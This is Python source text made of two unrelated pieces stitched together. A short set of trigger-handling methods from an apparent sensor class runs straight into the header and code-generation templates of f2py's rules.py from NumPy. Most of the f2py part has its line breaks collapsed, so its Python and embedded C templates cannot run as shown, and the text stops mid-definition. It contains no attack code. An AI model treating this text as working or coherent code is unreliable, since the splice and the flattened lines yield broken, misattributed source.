    def _log_request(self, msg, request, log_method=LOG.debug):
        # Log msg together with the request headers and body for debugging.
        headers = self._get_headers_as_dict(request.headers)
        body = str(request.body)
        log_method('%s\n\trequest.header: %s.\n\trequest.body: %s.', msg, headers, body)

    ##############################################
    # Event handler methods for the trigger events
    ##############################################

    def _handle_create_trigger(self, trigger):
        LOG.debug('Calling "add_trigger" method (trigger.type=%s)' % (trigger.type))
        trigger = self._sanitize_trigger(trigger=trigger)
        self.add_trigger(trigger=trigger)

    def _handle_update_trigger(self, trigger):
        LOG.debug('Calling "update_trigger" method (trigger.type=%s)' % (trigger.type))
        trigger = self._sanitize_trigger(trigger=trigger)
        self.update_trigger(trigger=trigger)

    def _handle_delete_trigger(self, trigger):
        LOG.debug('Calling "remove_trigger" method (trigger.type=%s)' % (trigger.type))
        trigger = self._sanitize_trigger(trigger=trigger)
        self.remove_trigger(trigger=trigger)

    def _sanitize_trigger(self, trigger):
        # Convert a trigger DB model into a plain dict via its API model.
        sanitized = TriggerAPI.from_model(trigger).to_dict()
        return sanitized
#!/usr/bin/env python """ Rules for building C/API module with f2py2e. Here is a skeleton of a new wrapper function (13Dec2001): wrapper_function(args) declarations get_python_arguments, say, `a' and `b' get_a_from_python if (successful) { get_b_from_python if (successful) { callfortran if (succesful) { put_a_to_python if (succesful) { put_b_to_python if (succesful) { buildvalue = ... } } } } cleanup_b } cleanup_a return buildvalue """ """ Copyright 1999,2000 Pearu Peterson all rights reserved, Pearu Peterson <pearu@ioc.ee> Permission to use, modify, and distribute this software is given under the terms of the NumPy License. NO WARRANTY IS EXPRESSED OR IMPLIED. USE AT YOUR OWN RISK. $Date: 2005/08/30 08:58:42 $ Pearu Peterson """ __version__ = "$Revision: 1.129 $"[10:-1] import __version__ f2py_version = __version__.version import pprint import sys import time import types import copy errmess=sys.stderr.write outmess=sys.stdout.write show=pprint.pprint from auxfuncs import * import capi_maps from capi_maps import * import cfuncs import common_rules import use_rules import f90mod_rules import func2subr options={} sepdict={} #for k in ['need_cfuncs']: sepdict[k]=',' for k in ['decl', 'frompyobj', 'cleanupfrompyobj', 'topyarr','method', 'pyobjfrom','closepyobjfrom', 'freemem', 'userincludes', 'includes0','includes','typedefs','typedefs_generated', 'cppmacros','cfuncs','callbacks', 'latexdoc', 'restdoc', 'routine_defs','externroutines', 'initf2pywraphooks', 'commonhooks','initcommonhooks', 'f90modhooks','initf90modhooks']: sepdict[k]='\n' #################### Rules for C/API module ################# module_rules={ 'modulebody':"""\ /* File: #modulename#module.c * This file is auto-generated with f2py (version:#f2py_version#). * f2py is a Fortran to Python Interface Generator (FPIG), Second Edition, * written by Pearu Peterson <pearu@cens.ioc.ee>. 
* See http://cens.ioc.ee/projects/f2py2e/ * Generation date: """+time.asctime(time.localtime(time.time()))+""" * $R"""+"""evision:$ * $D"""+"""ate:$ * Do not edit this file directly unless you know what you are doing!!! */ #ifdef __cplusplus extern \"C\" { #endif """+gentitle("See f2py2e/cfuncs.py: includes")+""" #includes# #includes0# """+gentitle("See f2py2e/rules.py: mod_rules['modulebody']")+""" static PyObject *#modulename#_error; static PyObject *#modulename#_module; """+gentitle("See f2py2e/cfuncs.py: typedefs")+""" #typedefs# """+gentitle("See f2py2e/cfuncs.py: typedefs_generated")+""" #typedefs_generated# """+gentitle("See f2py2e/cfuncs.py: cppmacros")+""" #cppmacros# """+gentitle("See f2py2e/cfuncs.py: cfuncs")+""" #cfuncs# """+gentitle("See f2py2e/cfuncs.py: userincludes")+""" #userincludes# """+gentitle("See f2py2e/capi_rules.py: usercode")+""" #usercode# /* See f2py2e/rules.py */ #externroutines# """+gentitle("See f2py2e/capi_rules.py: usercode1")+""" #usercode1# """+gentitle("See f2py2e/cb_rules.py: buildcallback")+""" #callbacks# """+gentitle("See f2py2e/rules.py: buildapi")+""" #body# """+gentitle("See f2py2e/f90mod_rules.py: buildhooks")+""" #f90modhooks# """+gentitle("See f2py2e/rules.py: module_rules['modulebody']")+""" """+gentitle("See f2py2e/common_rules.py: buildhooks")+""" #commonhooks# """+gentitle("See f2py2e/rules.py")+""" static FortranDataDef f2py_routine_defs[] = { #routine_defs# \t{NULL} }; static PyMethodDef f2py_module_methods[] = { #pymethoddef# \t{NULL,NULL} }; #if PY_VERSION_HEX >= 0x03000000 static struct PyModuleDef moduledef = { \tPyModuleDef_HEAD_INIT, \t"#modulename#", \tNULL, \t-1, \tf2py_module_methods, \tNULL, \tNULL, \tNULL, \tNULL }; #endif #if PY_VERSION_HEX >= 0x03000000 #define RETVAL m PyObject *PyInit_#modulename#(void) { #else #define RETVAL PyMODINIT_FUNC init#modulename#(void) { #endif \tint i; \tPyObject *m,*d, *s; #if PY_VERSION_HEX >= 0x03000000 \tm = #modulename#_module = PyModule_Create(&moduledef); #else 
\tm = #modulename#_module = Py_InitModule(\"#modulename#\", f2py_module_methods); #endif \tPy_TYPE(&PyFortran_Type) = &PyType_Type; \timport_array(); \tif (PyErr_Occurred()) \t\t{PyErr_SetString(PyExc_ImportError, \"can't initialize module #modulename# (failed to import numpy)\"); return RETVAL;} \td = PyModule_GetDict(m); \ts = PyString_FromString(\"$R"""+"""evision: $\"); \tPyDict_SetItemString(d, \"__version__\", s); #if PY_VERSION_HEX >= 0x03000000 \ts = PyUnicode_FromString( #else \ts = PyString_FromString( #endif \t\t\"This module '#modulename#' is auto-generated with f2py (version:#f2py_version#).\\nFunctions:\\n\"\n#docs#\".\"); \tPyDict_SetItemString(d, \"__doc__\", s); \t#modulename#_error = PyErr_NewException (\"#modulename#.error\", NULL, NULL); \tPy_DECREF(s); \tfor(i=0;f2py_routine_defs[i].name!=NULL;i++) \t\tPyDict_SetItemString(d, f2py_routine_defs[i].name,PyFortranObject_NewAsAttr(&f2py_routine_defs[i])); #initf2pywraphooks# #initf90modhooks# #initcommonhooks# #interface_usercode# #ifdef F2PY_REPORT_ATEXIT \tif (! 
PyErr_Occurred()) \t\ton_exit(f2py_report_on_exit,(void*)\"#modulename#\"); #endif \treturn RETVAL; } #ifdef __cplusplus } #endif """, 'separatorsfor':{'latexdoc':'\n\n', 'restdoc':'\n\n'}, 'latexdoc':['\\section{Module \\texttt{#texmodulename#}}\n', '#modnote#\n', '#latexdoc#'], 'restdoc':['Module #modulename#\n'+'='*80, '\n#restdoc#'] } defmod_rules=[ {'body':'/*eof body*/', 'method':'/*eof method*/', 'externroutines':'/*eof externroutines*/', 'routine_defs':'/*eof routine_defs*/', 'initf90modhooks':'/*eof initf90modhooks*/', 'initf2pywraphooks':'/*eof initf2pywraphooks*/', 'initcommonhooks':'/*eof initcommonhooks*/', 'latexdoc':'', 'restdoc':'', 'modnote':{hasnote:'#note#',l_not(hasnote):''}, } ] routine_rules={ 'separatorsfor':sepdict, 'body':""" #begintitle# static char doc_#apiname#[] = \"\\\nFunction signature:\\n\\\n\t#docreturn##name#(#docsignatureshort#)\\n\\\n#docstrsigns#\"; /* #declfortranroutine# */ static PyObject *#apiname#(const PyObject *capi_self, PyObject *capi_args, PyObject *capi_keywds, #functype# (*f2py_func)(#callprotoargument#)) { \tPyObject * volatile capi_buildvalue = NULL; \tvolatile int f2py_success = 1; #decl# \tstatic char *capi_kwlist[] = {#kwlist##kwlistopt##kwlistxa#NULL}; #usercode# #routdebugenter# #ifdef F2PY_REPORT_ATEXIT f2py_start_clock(); #endif \tif (!PyArg_ParseTupleAndKeywords(capi_args,capi_keywds,\\ \t\t\"#argformat##keyformat##xaformat#:#pyname#\",\\ \t\tcapi_kwlist#args_capi##keys_capi##keys_xa#))\n\t\treturn NULL; #frompyobj# /*end of frompyobj*/ #ifdef F2PY_REPORT_ATEXIT f2py_start_call_clock(); #endif #callfortranroutine# if (PyErr_Occurred()) f2py_success = 0; #ifdef F2PY_REPORT_ATEXIT f2py_stop_call_clock(); #endif /*end of callfortranroutine*/ \t\tif (f2py_success) { #pyobjfrom# /*end of pyobjfrom*/ \t\tCFUNCSMESS(\"Building return value.\\n\"); \t\tcapi_buildvalue = Py_BuildValue(\"#returnformat#\"#return#); /*closepyobjfrom*/ #closepyobjfrom# \t\t} /*if (f2py_success) after callfortranroutine*/ 
/*cleanupfrompyobj*/ #cleanupfrompyobj# \tif (capi_buildvalue == NULL) { #routdebugfailure# \t} else { #routdebugleave# \t} \tCFUNCSMESS(\"Freeing memory.\\n\"); #freemem# #ifdef F2PY_REPORT_ATEXIT f2py_stop_clock(); #endif \treturn capi_buildvalue; } #endtitle# """, 'routine_defs':'#routine_def#', 'initf2pywraphooks':'#initf2pywraphook#', 'externroutines':'#declfortranroutine#', 'doc':'#docreturn##name#(#docsignature#)', 'docshort':'#docreturn##name#(#docsignatureshort#)', 'docs':'"\t#docreturn##name#(#docsignature#)\\n"\n', 'need':['arrayobject.h','CFUNCSMESS','MINMAX'], 'cppmacros':{debugcapi:'#define DEBUGCFUNCS'}, 'latexdoc':['\\subsection{Wrapper function \\texttt{#texname#}}\n', """ \\noindent{{}\\verb@#docreturn##name#@{}}\\texttt{(#latexdocsignatureshort#)} #routnote# #latexdocstrsigns# """], 'restdoc':['Wrapped function ``#name#``\n'+'-'*80, ] } ################## Rules for C/API function ############## rout_rules=[ { # Init 'separatorsfor': {'callfortranroutine':'\n','routdebugenter':'\n','decl':'\n', 'routdebugleave':'\n','routdebugfailure':'\n', 'setjmpbuf':' || ', 'docstrreq':'\n','docstropt':'\n','docstrout':'\n', 'docstrcbs':'\n','docstrsigns':'\\n"\n"', 'latexdocstrsigns':'\n', 'latexdocstrreq':'\n','latexdocstropt':'\n', 'latexdocstrout':'\n','latexdocstrcbs':'\n', }, 'kwlist':'','kwlistopt':'','callfortran':'','callfortranappend':'', 'docsign':'','docsignopt':'','decl':'/*decl*/', 'freemem':'/*freemem*/', 'docsignshort':'','docsignoptshort':'', 'docstrsigns':'','latexdocstrsigns':'', 'docstrreq':'Required arguments:', 'docstropt':'Optional arguments:', 'docstrout':'Return objects:', 'docstrcbs':'Call-back functions:', 'latexdocstrreq':'\\noindent Required arguments:', 'latexdocstropt':'\\noindent Optional arguments:', 'latexdocstrout':'\\noindent Return objects:', 'latexdocstrcbs':'\\noindent Call-back functions:', 'args_capi':'','keys_capi':'','functype':'', 'frompyobj':'/*frompyobj*/', 'cleanupfrompyobj':['/*end of cleanupfrompyobj*/'], #this 
list will be reversed 'pyobjfrom':'/*pyobjfrom*/', 'closepyobjfrom':['/*end of closepyobjfrom*/'], #this list will be reversed 'topyarr':'/*topyarr*/','routdebugleave':'/*routdebugleave*/', 'routdebugenter':'/*routdebugenter*/', 'routdebugfailure':'/*routdebugfailure*/', 'callfortranroutine':'/*callfortranroutine*/', 'argformat':'','keyformat':'','need_cfuncs':'', 'docreturn':'','return':'','returnformat':'','rformat':'', 'kwlistxa':'','keys_xa':'','xaformat':'','docsignxa':'','docsignxashort':'', 'initf2pywraphook':'', 'routnote':{hasnote:'--- #note#',l_not(hasnote):''}, },{ 'apiname':'f2py_rout_#modulename#_#name#', 'pyname':'#modulename#.#name#', 'decl':'', '_check':l_not(ismoduleroutine) },{ 'apiname':'f2py_rout_#modulename#_#f90modulename#_#name#', 'pyname':'#modulename#.#f90modulename#.#name#', 'decl':'', '_check':ismoduleroutine },{ # Subroutine 'functype':'void', 'declfortranroutine':{l_and(l_not(l_or(ismoduleroutine,isintent_c)),l_not(isdummyroutine)):'extern void #F_FUNC#(#fortranname#,#FORTRANNAME#)(#callprotoargument#);', l_and(l_not(ismoduleroutine),isintent_c,l_not(isdummyroutine)):'extern void #fortranname#(#callprotoargument#);', ismoduleroutine:'', isdummyroutine:'' }, 'routine_def':{l_not(l_or(ismoduleroutine,isintent_c,isdummyroutine)):'\t{\"#name#\",-1,{{-1}},0,(char *)#F_FUNC#(#fortranname#,#FORTRANNAME#),(f2py_init_func)#apiname#,doc_#apiname#},', l_and(l_not(ismoduleroutine),isintent_c,l_not(isdummyroutine)):'\t{\"#name#\",-1,{{-1}},0,(char *)#fortranname#,(f2py_init_func)#apiname#,doc_#apiname#},', l_and(l_not(ismoduleroutine),isdummyroutine):'\t{\"#name#\",-1,{{-1}},0,NULL,(f2py_init_func)#apiname#,doc_#apiname#},', }, 'need':{l_and(l_not(l_or(ismoduleroutine,isintent_c)),l_not(isdummyroutine)):'F_FUNC'}, 'callfortranroutine':[ {debugcapi:["""\tfprintf(stderr,\"debug-capi:Fortran subroutine `#fortranname#(#callfortran#)\'\\n\");"""]}, {hasexternals:"""\ \t\tif (#setjmpbuf#) { \t\t\tf2py_success = 0; \t\t} else {"""}, 
{isthreadsafe:'\t\t\tPy_BEGIN_ALLOW_THREADS'}, {hascallstatement:'''\t\t\t\t#callstatement#; \t\t\t\t/*(*f2py_func)(#callfortran#);*/'''}, {l_not(l_or(hascallstatement,isdummyroutine)):'\t\t\t\t(*f2py_func)(#callfortran#);'}, {isthreadsafe:'\t\t\tPy_END_ALLOW_THREADS'}, {hasexternals:"""\t\t}"""} ], '_check':issubroutine, },{ # Wrapped function 'functype':'void', 'declfortranroutine':{l_not(l_or(ismoduleroutine,isdummyroutine)):'extern void #F_WRAPPEDFUNC#(#name_lower#,#NAME#)(#callprotoargument#);', isdummyroutine:'', }, 'routine_def':{l_not(l_or(ismoduleroutine,isdummyroutine)):'\t{\"#name#\",-1,{{-1}},0,(char *)#F_WRAPPEDFUNC#(#name_lower#,#NAME#),(f2py_init_func)#apiname#,doc_#apiname#},', isdummyroutine:'\t{\"#name#\",-1,{{-1}},0,NULL,(f2py_init_func)#apiname#,doc_#apiname#},', }, 'initf2pywraphook':{l_not(l_or(ismoduleroutine,isdummyroutine)):''' { extern #ctype# #F_FUNC#(#name_lower#,#NAME#)(void); PyObject* o = PyDict_GetItemString(d,"#name#"); PyObject_SetAttrString(o,"_cpointer", F2PyCapsule_FromVoidPtr((void*)#F_FUNC#(#name_lower#,#NAME#),NULL)); #if PY_VERSION_HEX >= 0x03000000 PyObject_SetAttrString(o,"__name__", PyUnicode_FromString("#name#")); #else PyObject_SetAttrString(o,"__name__", PyString_FromString("#name#")); #endif } '''}, 'need':{l_not(l_or(ismoduleroutine,isdummyroutine)):['F_WRAPPEDFUNC','F_FUNC']}, 'callfortranroutine':[ {debugcapi:["""\tfprintf(stderr,\"debug-capi:Fortran subroutine `f2pywrap#name_lower#(#callfortran#)\'\\n\");"""]}, {hasexternals:"""\ \tif (#setjmpbuf#) { \t\tf2py_success = 0; \t} else {"""}, {isthreadsafe:'\tPy_BEGIN_ALLOW_THREADS'}, {l_not(l_or(hascallstatement,isdummyroutine)):'\t(*f2py_func)(#callfortran#);'}, {hascallstatement:'\t#callstatement#;\n\t/*(*f2py_func)(#callfortran#);*/'}, {isthreadsafe:'\tPy_END_ALLOW_THREADS'}, {hasexternals:'\t}'} ], '_check':isfunction_wrap, },{ # Function 'functype':'#ctype#', 'docreturn':{l_not(isintent_hide):'#rname#,'}, 'docstrout':'\t#pydocsignout#', 
'latexdocstrout':['\\item[]{{}\\verb@#pydocsignout#@{}}', {hasresultnote:'--- #resultnote#'}], 'callfortranroutine':[{l_and(debugcapi,isstringfunction):"""\ #ifdef USESCOMPAQFORTRAN \tfprintf(stderr,\"debug-capi:Fortran function #ctype# #fortranname#(#callcompaqfortran#)\\n\"); #else \tfprintf(stderr,\"debug-capi:Fortran function #ctype# #fortranname#(#callfortran#)\\n\"); #endif """}, {l_and(debugcapi,l_not(isstringfunction)):"""\ \tfprintf(stderr,\"debug-capi:Fortran function #ctype# #fortranname#(#callfortran#)\\n\"); """} ], '_check':l_and(isfunction,l_not(isfunction_wrap)) },{ # Scalar function 'declfortranroutine':{l_and(l_not(l_or(ismoduleroutine,isintent_c)),l_not(isdummyroutine)):'extern #ctype# #F_FUNC#(#fortranname#,#FORTRANNAME#)(#callprotoargument#);', l_and(l_not(ismoduleroutine),isintent_c,l_not(isdummyroutine)):'extern #ctype# #fortranname#(#callprotoargument#);', isdummyroutine:'' }, 'routine_def':{l_and(l_not(l_or(ismoduleroutine,isintent_c)),l_not(isdummyroutine)):'\t{\"#name#\",-1,{{-1}},0,(char *)#F_FUNC#(#fortranname#,#FORTRANNAME#),(f2py_init_func)#apiname#,doc_#apiname#},', l_and(l_not(ismoduleroutine),isintent_c,l_not(isdummyroutine)):'\t{\"#name#\",-1,{{-1}},0,(char *)#fortranname#,(f2py_init_func)#apiname#,doc_#apiname#},', isdummyroutine:'\t{\"#name#\",-1,{{-1}},0,NULL,(f2py_init_func)#apiname#,doc_#apiname#},', }, 'decl':[{iscomplexfunction_warn:'\t#ctype# #name#_return_value={0,0};', l_not(iscomplexfunction):'\t#ctype# #name#_return_value=0;'}, {iscomplexfunction:'\tPyObject *#name#_return_value_capi = Py_None;'} ], 'callfortranroutine':[ {hasexternals:"""\ \tif (#setjmpbuf#) { \t\tf2py_success = 0; \t} else {"""}, {isthreadsafe:'\tPy_BEGIN_ALLOW_THREADS'}, {hascallstatement:'''\t#callstatement#; /*\t#name#_return_value = (*f2py_func)(#callfortran#);*/ '''}, {l_not(l_or(hascallstatement,isdummyroutine)):'\t#name#_return_value = (*f2py_func)(#callfortran#);'}, {isthreadsafe:'\tPy_END_ALLOW_THREADS'}, {hasexternals:'\t}'}, 
{l_and(debugcapi,iscomplexfunction):'\tfprintf(stderr,"#routdebugshowvalue#\\n",#name#_return_value.r,#name#_return_value.i);'}, {l_and(debugcapi,l_not(iscomplexfunction)):'\tfprintf(stderr,"#routdebugshowvalue#\\n",#name#_return_value);'}], 'pyobjfrom':{iscomplexfunction:'\t#name#_return_value_capi = pyobj_from_#ctype#1(#name#_return_value);'}, 'need':[{l_not(isdummyroutine):'F_FUNC'}, {iscomplexfunction:'pyobj_from_#ctype#1'}, {islong_longfunction:'long_long'}, {islong_doublefunction:'long_double'}], 'returnformat':{l_not(isintent_hide):'#rformat#'}, 'return':{iscomplexfunction:',#name#_return_value_capi', l_not(l_or(iscomplexfunction,isintent_hide)):',#name#_return_value'}, '_check':l_and(isfunction,l_not(isstringfunction),l_not(isfunction_wrap)) },{ # String function # in use for --no-wrap 'declfortranroutine':'extern void #F_FUNC#(#fortranname#,#FORTRANNAME#)(#callprotoargument#);', 'routine_def':{l_not(l_or(ismoduleroutine,isintent_c)): # '\t{\"#name#\",-1,{{-1}},0,(char *)F_FUNC(#fortranname#,#FORTRANNAME#),(void *)#apiname#,doc_#apiname#},', '\t{\"#name#\",-1,{{-1}},0,(char *)#F_FUNC#(#fortranname#,#FORTRANNAME#),(f2py_init_func)#apiname#,doc_#apiname#},', l_and(l_not(ismoduleroutine),isintent_c): # '\t{\"#name#\",-1,{{-1}},0,(char *)#fortranname#,(void *)#apiname#,doc_#apiname#},' '\t{\"#name#\",-1,{{-1}},0,(char *)#fortranname#,(f2py_init_func)#apiname#,doc_#apiname#},' }, 'decl':['\t#ctype# #name#_return_value = NULL;', '\tint #name#_return_value_len = 0;'], 'callfortran':'#name#_return_value,#name#_return_value_len,', 'callfortranroutine':['\t#name#_return_value_len = #rlength#;', '\tif ((#name#_return_value = (string)malloc(sizeof(char)*(#name#_return_value_len+1))) == NULL) {', '\t\tPyErr_SetString(PyExc_MemoryError, \"out of memory\");', '\t\tf2py_success = 0;', '\t} else {', "\t\t(#name#_return_value)[#name#_return_value_len] = '\\0';", '\t}', '\tif (f2py_success) {', {hasexternals:"""\ \t\tif (#setjmpbuf#) { \t\t\tf2py_success = 0; \t\t} else 
{"""}, {isthreadsafe:'\t\tPy_BEGIN_ALLOW_THREADS'}, """\ #ifdef USESCOMPAQFORTRAN \t\t(*f2py_func)(#callcompaqfortran#); #else \t\t(*f2py_func)(#callfortran#); #endif """, {isthreadsafe:'\t\tPy_END_ALLOW_THREADS'}, {hasexternals:'\t\t}'}, {debugcapi:'\t\tfprintf(stderr,"#routdebugshowvalue#\\n",#name#_return_value_len,#name#_return_value);'}, '\t} /* if (f2py_success) after (string)malloc */', ], 'returnformat':'#rformat#', 'return':',#name#_return_value', 'freemem':'\tSTRINGFREE(#name#_return_value);', 'need':['F_FUNC','#ctype#','STRINGFREE'], '_check':l_and(isstringfunction,l_not(isfunction_wrap)) # ???obsolete }, { # Debugging 'routdebugenter':'\tfprintf(stderr,"debug-capi:Python C/API function #modulename#.#name#(#docsignature#)\\n");', 'routdebugleave':'\tfprintf(stderr,"debug-capi:Python C/API function #modulename#.#name#: successful.\\n");', 'routdebugfailure':'\tfprintf(stderr,"debug-capi:Python C/API function #modulename#.#name#: failure.\\n");', '_check':debugcapi } ] ################ Rules for arguments ################## typedef_need_dict = {islong_long:'long_long', islong_double:'long_double', islong_complex:'complex_long_double', isunsigned_char:'unsigned_char', isunsigned_short:'unsigned_short', isunsigned:'unsigned', isunsigned_long_long:'unsigned_long_long', isunsigned_chararray:'unsigned_char', isunsigned_shortarray:'unsigned_short', isunsigned_long_longarray:'unsigned_long_long', issigned_long_longarray:'long_long', } aux_rules=[ { 'separatorsfor':sepdict }, { # Common 'frompyobj':['\t/* Processing auxiliary variable #varname# */', {debugcapi:'\tfprintf(stderr,"#vardebuginfo#\\n");'},], 'cleanupfrompyobj':'\t/* End of cleaning variable #varname# */', 'need':typedef_need_dict, }, # Scalars (not complex) { # Common 'decl':'\t#ctype# #varname# = 0;', 'need':{hasinitvalue:'math.h'}, 'frompyobj':{hasinitvalue:'\t#varname# = #init#;'}, '_check':l_and(isscalar,l_not(iscomplex)), }, { 'return':',#varname#', 'docstrout':'\t#pydocsignout#', 
'docreturn':'#outvarname#,', 'returnformat':'#varrformat#', '_check':l_and(isscalar,l_not(iscomplex),isintent_out), }, # Complex scalars { # Common 'decl':'\t#ctype# #varname#;', 'frompyobj': {hasinitvalue:'\t#varname#.r = #init.r#, #varname#.i = #init.i#;'}, '_check':iscomplex }, # String { # Common 'decl':['\t#ctype# #varname# = NULL;', '\tint slen(#varname#);', ], 'need':['len..'], '_check':isstring }, # Array { # Common 'decl':['\t#ctype# *#varname# = NULL;', '\tnpy_intp #varname#_Dims[#rank#] = {#rank*[-1]#};', '\tconst int #varname#_Rank = #rank#;', ], 'need':['len..',{hasinitvalue:'forcomb'},{hasinitvalue:'CFUNCSMESS'}], '_check':isarray }, # Scalararray { # Common '_check':l_and(isarray,l_not(iscomplexarray)) },{ # Not hidden '_check':l_and(isarray,l_not(iscomplexarray),isintent_nothide) }, # Integer*1 array {'need':'#ctype#', '_check':isint1array, '_depend':'' }, # Integer*-1 array {'need':'#ctype#', '_check':isunsigned_chararray, '_depend':'' }, # Integer*-2 array {'need':'#ctype#', '_check':isunsigned_shortarray, '_depend':'' }, # Integer*-8 array {'need':'#ctype#', '_check':isunsigned_long_longarray, '_depend':'' }, # Complexarray {'need':'#ctype#', '_check':iscomplexarray, '_depend':'' }, # Stringarray { 'callfortranappend':{isarrayofstrings:'flen(#varname#),'}, 'need':'string', '_check':isstringarray } ] arg_rules=[ { 'separatorsfor':sepdict }, { # Common 'frompyobj':['\t/* Processing variable #varname# */', {debugcapi:'\tfprintf(stderr,"#vardebuginfo#\\n");'},], 'cleanupfrompyobj':'\t/* End of cleaning variable #varname# */', '_depend':'', 'need':typedef_need_dict, }, # Doc signatures { 'docstropt':{l_and(isoptional,isintent_nothide):'\t#pydocsign#'}, 'docstrreq':{l_and(isrequired,isintent_nothide):'\t#pydocsign#'}, 'docstrout':{isintent_out:'\t#pydocsignout#'}, 'latexdocstropt':{l_and(isoptional,isintent_nothide):['\\item[]{{}\\verb@#pydocsign#@{}}', {hasnote:'--- #note#'}]}, 
'latexdocstrreq':{l_and(isrequired,isintent_nothide):['\\item[]{{}\\verb@#pydocsign#@{}}', {hasnote:'--- #note#'}]}, 'latexdocstrout':{isintent_out:['\\item[]{{}\\verb@#pydocsignout#@{}}', {l_and(hasnote,isintent_hide):'--- #note#', l_and(hasnote,isintent_nothide):'--- See above.'}]}, 'depend':'' }, # Required/Optional arguments { 'kwlist':'"#varname#",', 'docsign':'#varname#,', '_check':l_and(isintent_nothide,l_not(isoptional)) }, { 'kwlistopt':'"#varname#",', 'docsignopt':'#varname#=#showinit#,', 'docsignoptshort':'#varname#,', '_check':l_and(isintent_nothide,isoptional) }, # Docstring/BuildValue { 'docreturn':'#outvarname#,', 'returnformat':'#varrformat#', '_check':isintent_out }, # Externals (call-back functions) { # Common 'docsignxa':{isintent_nothide:'#varname#_extra_args=(),'}, 'docsignxashort':{isintent_nothide:'#varname#_extra_args,'}, 'docstropt':{isintent_nothide:'\t#varname#_extra_args := () input tuple'}, 'docstrcbs':'#cbdocstr#', 'latexdocstrcbs':'\\item[] #cblatexdocstr#', 'latexdocstropt':{isintent_nothide:'\\item[]{{}\\verb@#varname#_extra_args := () input tuple@{}} --- Extra arguments for call-back function {{}\\verb@#varname#@{}}.'}, 'decl':['\tPyObject *#varname#_capi = Py_None;', '\tPyTupleObject *#varname#_xa_capi = NULL;', '\tPyTupleObject *#varname#_args_capi = NULL;', '\tint #varname#_nofargs_capi = 0;', {l_not(isintent_callback):'\t#cbname#_typedef #varname#_cptr;'} ], 'kwlistxa':{isintent_nothide:'"#varname#_extra_args",'}, 'argformat':{isrequired:'O'}, 'keyformat':{isoptional:'O'}, 'xaformat':{isintent_nothide:'O!'}, 'args_capi':{isrequired:',&#varname#_capi'}, 'keys_capi':{isoptional:',&#varname#_capi'}, 'keys_xa':',&PyTuple_Type,&#varname#_xa_capi', 'setjmpbuf':'(setjmp(#cbname#_jmpbuf))', 'callfortran':{l_not(isintent_callback):'#varname#_cptr,'}, 'need':['#cbname#','setjmp.h'], '_check':isexternal }, { 'frompyobj':[{l_not(isintent_callback):"""\ if(F2PyCapsule_Check(#varname#_capi)) { #varname#_cptr = 
F2PyCapsule_AsVoidPtr(#varname#_capi); } else { #varname#_cptr = #cbname#; } """},{isintent_callback:"""\ if (#varname#_capi==Py_None) { #varname#_capi = PyObject_GetAttrString(#modulename#_module,\"#varname#\"); if (#varname#_capi) { if (#varname#_xa_capi==NULL) { if (PyObject_HasAttrString(#modulename#_module,\"#varname#_extra_args\")) { PyObject* capi_tmp = PyObject_GetAttrString(#modulename#_module,\"#varname#_extra_args\"); if (capi_tmp) #varname#_xa_capi = (PyTupleObject *)PySequence_Tuple(capi_tmp); else #varname#_xa_capi = (PyTupleObject *)Py_BuildValue(\"()\"); if (#varname#_xa_capi==NULL) { PyErr_SetString(#modulename#_error,\"Failed to convert #modulename#.#varname#_extra_args to tuple.\\n\"); return NULL; } } } } if (#varname#_capi==NULL) { PyErr_SetString(#modulename#_error,\"Callback #varname# not defined (as an argument or module #modulename# attribute).\\n\"); return NULL; } } """}, ## {l_not(isintent_callback):"""\ ## if (#varname#_capi==Py_None) { ## printf(\"hoi\\n\"); ## } ## """}, """\ \t#varname#_nofargs_capi = #cbname#_nofargs; \tif (create_cb_arglist(#varname#_capi,#varname#_xa_capi,#maxnofargs#,#nofoptargs#,&#cbname#_nofargs,&#varname#_args_capi,\"failed in processing argument list for call-back #varname#.\")) { \t\tjmp_buf #varname#_jmpbuf;""", {debugcapi:["""\ \t\tfprintf(stderr,\"debug-capi:Assuming %d arguments; at most #maxnofargs#(-#nofoptargs#) is expected.\\n\",#cbname#_nofargs); \t\tCFUNCSMESSPY(\"for #varname#=\",#cbname#_capi);""", {l_not(isintent_callback):"""\t\tfprintf(stderr,\"#vardebugshowvalue# (call-back in C).\\n\",#cbname#);"""}]}, """\ \t\tCFUNCSMESS(\"Saving jmpbuf for `#varname#`.\\n\"); \t\tSWAP(#varname#_capi,#cbname#_capi,PyObject); \t\tSWAP(#varname#_args_capi,#cbname#_args_capi,PyTupleObject); \t\tmemcpy(&#varname#_jmpbuf,&#cbname#_jmpbuf,sizeof(jmp_buf));""", ], 'cleanupfrompyobj': """\ \t\tCFUNCSMESS(\"Restoring jmpbuf for `#varname#`.\\n\"); \t\t#cbname#_capi = #varname#_capi; 
\t\tPy_DECREF(#cbname#_args_capi); \t\t#cbname#_args_capi = #varname#_args_capi; \t\t#cbname#_nofargs = #varname#_nofargs_capi; \t\tmemcpy(&#cbname#_jmpbuf,&#varname#_jmpbuf,sizeof(jmp_buf)); \t}""", 'need':['SWAP','create_cb_arglist'], '_check':isexternal, '_depend':'' }, # Scalars (not complex) { # Common 'decl':'\t#ctype# #varname# = 0;', 'pyobjfrom':{debugcapi:'\tfprintf(stderr,"#vardebugshowvalue#\\n",#varname#);'}, 'callfortran':{isintent_c:'#varname#,',l_not(isintent_c):'&#varname#,'}, 'return':{isintent_out:',#varname#'}, '_check':l_and(isscalar,l_not(iscomplex)) },{ 'need':{hasinitvalue:'math.h'}, '_check':l_and(isscalar,l_not(iscomplex)), #'_depend':'' },{ # Not hidden 'decl':'\tPyObject *#varname#_capi = Py_None;', 'argformat':{isrequired:'O'}, 'keyformat':{isoptional:'O'}, 'args_capi':{isrequired:',&#varname#_capi'}, 'keys_capi':{isoptional:',&#varname#_capi'}, 'pyobjfrom':{isintent_inout:"""\ \tf2py_success = try_pyarr_from_#ctype#(#varname#_capi,&#varname#); \tif (f2py_success) {"""}, 'closepyobjfrom':{isintent_inout:"\t} /*if (f2py_success) of #varname# pyobjfrom*/"}, 'need':{isintent_inout:'try_pyarr_from_#ctype#'}, '_check':l_and(isscalar,l_not(iscomplex),isintent_nothide) },{ 'frompyobj':[ # hasinitvalue... # if pyobj is None: # varname = init # else # from_pyobj(varname) # # isoptional and noinitvalue... # if pyobj is not None: # from_pyobj(varname) # else: # varname is uninitialized # # ... 
